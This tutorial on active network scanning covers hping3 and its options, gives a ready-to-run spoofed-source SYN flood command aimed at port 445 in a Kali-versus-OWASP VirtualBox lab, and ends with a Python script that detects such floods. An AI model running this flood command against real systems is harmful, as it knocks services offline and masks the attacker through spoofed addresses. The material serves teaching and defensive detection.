In general, there are two types of network scan:
- Passive scan (Wireshark, ARP tables)
- Active scan (hping, Nmap, Scapy, etc.)
The difference between the two is that a passive scan will not be noticed by the target. An active scan, on the other hand, sends packets to the target, so it leaves traces and requires more preparation before scanning the target system.
Today, we are going to cover some useful active scan tools.
Hping is a command-line oriented TCP/IP packet assembler/analyzer.
Its features include:
- TCP/IP packet analysis
- Support for TCP, UDP and ICMP
- Firewall testing
- Port scanning
- Remote OS fingerprinting
- DoS attacks
The options used below (see the man page for the full list):
- --flood: send packets as fast as possible and don't show replies
- --rand-dest: random destination address mode
- --rand-source: random (spoofed) source address mode
- -V --verbose: verbose output
- -c --count: packet count
- -d --data: data size
- -S --syn: set the SYN flag
- -w --win: window size (default 64)
- -p --destport [+][+]<port>: destination port (default 0); ctrl+z increments/decrements it
- -s --baseport: base source port (default random)
The command used for this test:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source TARGET_ADDRESS
To test this case, I used Kali (attacker) and OWASP (victim) as VMs in VirtualBox.
In Wireshark, we can see tons of TCP packets sent from Kali to the OWASP server, each with a random source IP address.
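Seen from the victim's side, the pattern visible in that Wireshark capture (a burst of bare SYNs to one port from many source addresses that never complete a handshake) can be turned into a simple detection rule. The following is an added example, not code from the original post; it runs over constructed packet summaries (all addresses and timings are made up), and the thresholds are assumptions to be tuned per network:

```python
from collections import defaultdict

# Constructed sample in the shape of a tshark/Wireshark export:
# (time_s, src_ip, dst_ip, dst_port, tcp_flags). The burst to port 445 from
# eight unrelated sources mirrors a spoofed-source SYN flood; the port 80
# lines are ordinary traffic from one client that must not raise an alert.
SAMPLE_PACKETS = [
    (0.0010, "10.77.1.5", "192.168.56.101", 445, "S"),
    (0.0012, "172.19.8.9", "192.168.56.101", 445, "S"),
    (0.0013, "203.0.113.7", "192.168.56.101", 445, "S"),
    (0.0015, "198.51.100.2", "192.168.56.101", 445, "S"),
    (0.0016, "10.3.3.3", "192.168.56.101", 445, "S"),
    (0.0018, "192.0.2.44", "192.168.56.101", 445, "S"),
    (0.0019, "172.31.0.1", "192.168.56.101", 445, "S"),
    (0.0021, "10.9.9.9", "192.168.56.101", 445, "S"),
    (0.5000, "192.168.56.1", "192.168.56.101", 80, "S"),
    (0.5010, "192.168.56.1", "192.168.56.101", 80, "A"),
    (2.4000, "192.168.56.1", "192.168.56.101", 80, "S"),
    (2.4010, "192.168.56.1", "192.168.56.101", 80, "A"),
]

def detect_syn_flood(packets, window=1.0, min_syns=5, min_distinct_ratio=0.8):
    """Return {(dst_ip, dst_port): (syn_count, distinct_sources)} for every
    target that, inside some `window` seconds, received at least `min_syns`
    bare SYNs where distinct sources / SYNs >= min_distinct_ratio.
    A spoofed-source flood scores a ratio near 1.0; a busy but legitimate
    service sees repeat clients and a far lower ratio."""
    by_target = defaultdict(list)
    for t, src, dst, dport, flags in packets:
        if flags == "S":                      # SYN without ACK: handshake start
            by_target[(dst, dport)].append((t, src))
    alerts = {}
    for target, syns in by_target.items():
        syns.sort()
        start = 0
        for end in range(len(syns)):          # sliding time window over SYNs
            while syns[end][0] - syns[start][0] > window:
                start += 1
            count = end - start + 1
            distinct = len({src for _, src in syns[start:end + 1]})
            if count >= min_syns and distinct / count >= min_distinct_ratio:
                if count > alerts.get(target, (0, 0))[0]:
                    alerts[target] = (count, distinct)   # keep the worst window
    return alerts

if __name__ == "__main__":
    for (dst, port), (n, d) in detect_syn_flood(SAMPLE_PACKETS).items():
        print(f"possible SYN flood on {dst}:{port}: {n} SYNs from {d} sources")
```

Real captures can be fed in from a tshark CSV export with the same five fields; the distinct-source ratio is what separates a spoofed flood from a popular service under normal load.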